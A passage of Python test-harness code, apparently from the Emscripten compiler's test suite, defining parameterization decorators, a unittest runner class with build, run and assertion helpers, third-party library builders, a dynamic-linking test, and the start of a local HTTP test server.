assert self.get_setting('MINIMAL_RUNTIME') is None
if with_minimal_runtime:
self.set_setting('MINIMAL_RUNTIME', 1)
f(self)
metafunc._parameterize = {'': (False,),
'minimal_runtime': (True,)}
return metafunc
def also_with_wasm_bigint(f):
assert callable(f)
def metafunc(self, with_bigint):
if with_bigint:
if not self.is_wasm():
self.skipTest('wasm2js does not support WASM_BIGINT')
if self.get_setting('WASM_BIGINT') is not None:
self.skipTest('redundant in bigint test config')
self.set_setting('WASM_BIGINT')
self.require_node()
self.node_args.append('--experimental-wasm-bigint')
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'bigint': (True,)}
return metafunc
def ensure_dir(dirname):
dirname = Path(dirname)
dirname.mkdir(parents=True, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
name = Path(name)
assert not name.is_absolute()
if binary:
name.write_bytes(contents)
else:
name.write_text(contents)
def make_executable(name):
Path(name).chmod(stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in ASan yet')
if '-fsanitize=leak' in self.emcc_args:
self.skipTest('no dynamic linking support in LSan yet')
if '-fsanitize=undefined' in self.emcc_args:
self.skipTest('no dynamic linking support in UBSan yet')
def require_v8(self):
if not config.V8_ENGINE or config.V8_ENGINE not in config.JS_ENGINES:
if 'EMTEST_SKIP_V8' in os.environ:
self.skipTest('test requires v8 and EMTEST_SKIP_V8 is set')
else:
self.fail('d8 required to run this test. Use EMTEST_SKIP_V8 to skip')
self.js_engines = [config.V8_ENGINE]
self.emcc_args.append('-sENVIRONMENT=shell')
def require_node(self):
if not config.NODE_JS or config.NODE_JS not in config.JS_ENGINES:
if 'EMTEST_SKIP_NODE' in os.environ:
self.skipTest('test requires node and EMTEST_SKIP_NODE is set')
else:
self.fail('node required to run this test. Use EMTEST_SKIP_NODE to skip')
if self.get_setting('MEMORY64') == 1:
self.skipTest("MEMORY64=1 tests don't yet run under node")
self.js_engines = [config.NODE_JS]
def setup_node_pthreads(self):
self.require_node()
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super().setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super().setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror', '-Wno-limited-postlink-optimizations']
# We want to be strict about closure warnings in our test code.
# TODO(sbc): Remove this if we make it the default for `-Werror`:
# https://github.com/emscripten-core/emscripten/issues/16205):
self.ldflags = ['-sCLOSURE_WARNINGS=error']
self.node_args = [
# Increate stack trace limit to maximise usefulness of test failure reports
'--stack-trace-limit=50',
# Opt in to node v15 default behaviour:
# https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode
'--unhandled-rejections=throw',
# Include backtrace for all uncuaght exceptions (not just Error).
'--trace-uncaught',
]
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = config.JS_ENGINES.copy()
self.wasm_engines = config.WASM_ENGINES.copy()
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when --save-dir is used we still try to start with an empty directory as many tests
# expect this. --no-clean can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
if type(value) == bool:
value = int(value)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret.append(f'-s{key}')
elif type(value) == list:
ret.append(f'-s{key}={",".join(value)}')
else:
ret.append(f'-s{key}={value}')
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False, ldflags=True):
args = self.serialize_settings() + self.emcc_args
if ldflags:
args += self.ldflags
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once its available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
try:
# es-check prints the details of the errors to stdout, but it also prints
# stuff in the case there are no errors:
# ES-Check: there were no ES version matching errors!
# pipe stdout and stderr so that we can choose if/when to print this
# output and avoid spamming stdout when tests are successful.
shared.run_process(es_check + ['es5', os.path.abspath(filename)], stdout=PIPE, stderr=STDOUT, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stdout)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False, js_outfile=True, emcc_args=[], output_basename=None):
suffix = '.js' if js_outfile else '.wasm'
compiler = [compiler_for(filename, force_c)]
if compiler[0] == EMCC:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# For historical reasons emcc compiles and links as C++ by default.
# However we want to run our tests in a more strict manner. We can
# remove this if the issue above is ever fixed.
compiler.append('-sNO_DEFAULT_TO_CXX')
if force_c:
compiler.append('-xc')
if output_basename:
output = output_basename + suffix
else:
basename = os.path.basename(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + emcc_args + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + str(include) for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and self.uses_memory_init_file():
src = read_file(output)
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
js = read_file(javascript_file)
blob = "".join(js.splitlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([WASM_DIS, wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def measure_wasm_code_lines(self, wasm):
wat_lines = self.get_wasm_text(wasm).splitlines()
non_data_lines = [line for line in wat_lines if '(data ' not in line]
return len(non_data_lines)
def run_js(self, filename, engine=None, args=[],
output_nicerizer=None,
assert_returncode=0,
interleaved_output=True):
# use files, as PIPE can get too full and hang us
stdout_file = self.in_dir('stdout')
stderr_file = None
if interleaved_output:
stderr = STDOUT
else:
stderr_file = self.in_dir('stderr')
stderr = open(stderr_file, 'w')
error = None
timeout_error = None
if not engine:
engine = self.js_engines[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout_file, 'w'),
stderr=stderr,
assert_returncode=assert_returncode)
except subprocess.TimeoutExpired as e:
timeout_error = e
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
ret = read_file(stdout_file)
if not interleaved_output:
ret += read_file(stderr_file)
if output_nicerizer:
ret = output_nicerizer(ret)
if error or timeout_error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(read_file(stdout_file), end='')
print('-- end program output --')
if not interleaved_output:
print('-- begin program stderr --')
print(read_file(stderr_file), end='')
print('-- end program stderr --')
if timeout_error:
raise timeout_error
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with --verbose.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertFileContents(self, filename, contents):
if EMTEST_VERBOSE:
print(f'Comparing results contents of file: {filename}')
contents = contents.replace('\r', '')
if EMTEST_REBASELINE:
with open(filename, 'w') as f:
f.write(contents)
return
if not os.path.exists(filename):
self.fail('Test expectation file not found: ' + filename + '.\n' +
'Run with --rebaseline to generate.')
expected_content = read_file(filename)
message = "Run with --rebaseline to automatically update expectations"
self.assertTextDataIdentical(expected_content, contents, message,
filename, filename + '.new')
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s'" % (limit_size(value), limit_size(string)))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(read_binary(file1),
read_binary(file2))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init=None, cache_name_extra='', native=False):
if env_init is None:
env_init = {}
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
# get_library() is used to compile libraries, and not link executables,
# so we don't want to pass linker flags here (emscripten warns if you
# try to pass linker settings when compiling).
emcc_args = self.get_emcc_args(ldflags=False)
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
write_binary(bc_file, contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
cflags = ' '.join(emcc_args)
env_init.setdefault('CFLAGS', cflags)
env_init.setdefault('CXXFLAGS', cflags)
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native)
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
print(e.stdout)
print(e.stderr)
self.fail(f'subprocess exited with non-zero return code({e.returncode}): `{shared.shlex_join(cmd)}`')
def emcc(self, filename, args=[], output_filename=None, **kwargs):
cmd = [compiler_for(filename), filename] + args
if output_filename:
cmd += ['-o', output_filename]
self.run_process(cmd, **kwargs)
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc() {
afunc("b");
}
''')
create_file('libc.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-sSIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.c', ['liba' + so])
ccshared('libc.c', ['liba' + so])
self.set_setting('MAIN_MODULE')
extra_args = ['-L.', 'libb' + so, 'libc' + so]
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n', emcc_args=extra_args)
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc_ptr)(), (*cfunc_ptr)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc_ptr = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc_ptr != NULL);
cfunc_ptr = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc_ptr != NULL);
bfunc_ptr();
cfunc_ptr();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = self.js_engines
for engine in js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
write_file(filename, src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
return self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, read_file(expected_output_filename), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
out_suffix = kwargs.pop('out_suffix', '')
outfile = shared.unsuffixed(srcfile) + out_suffix + '.out'
expected = read_file(outfile)
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False, emcc_args=[],
interleaved_output=True,
regex=False,
output_basename=None):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
js_file = self.build(filename, libraries=libraries, includes=includes,
force_c=force_c, emcc_args=emcc_args,
output_basename=output_basename)
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.replace_suffix(js_file, '.wasm.c')
executable = shared.replace_suffix(js_file, '.exe')
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode,
interleaved_output=interleaved_output)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all or len(expected_output) == 1:
for o in expected_output:
if regex:
self.assertTrue(re.search(o, js_output), 'Expected regex "%s" to match on:\n%s' % (regex, js_output))
else:
self.assertContained(o, js_output)
else:
if regex:
match_any = any(re.search(o, js_output) for o in expected_output)
self.assertTrue(match_any, 'Expected at least one of "%s" to match on:\n%s' % (expected_output, js_output))
else:
self.assertContained(expected_output, js_output)
if assert_returncode == 0 and check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
return js_output
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party/freetype/include'),
'-I' + test_file('third_party/poppler/include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
# TODO: remove -Wno-unknown-warning-option when clang rev 11da1b53 rolls into emscripten
self.emcc_args += ['-Wno-deprecated-non-prototype', '-Wno-unknown-warning-option']
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
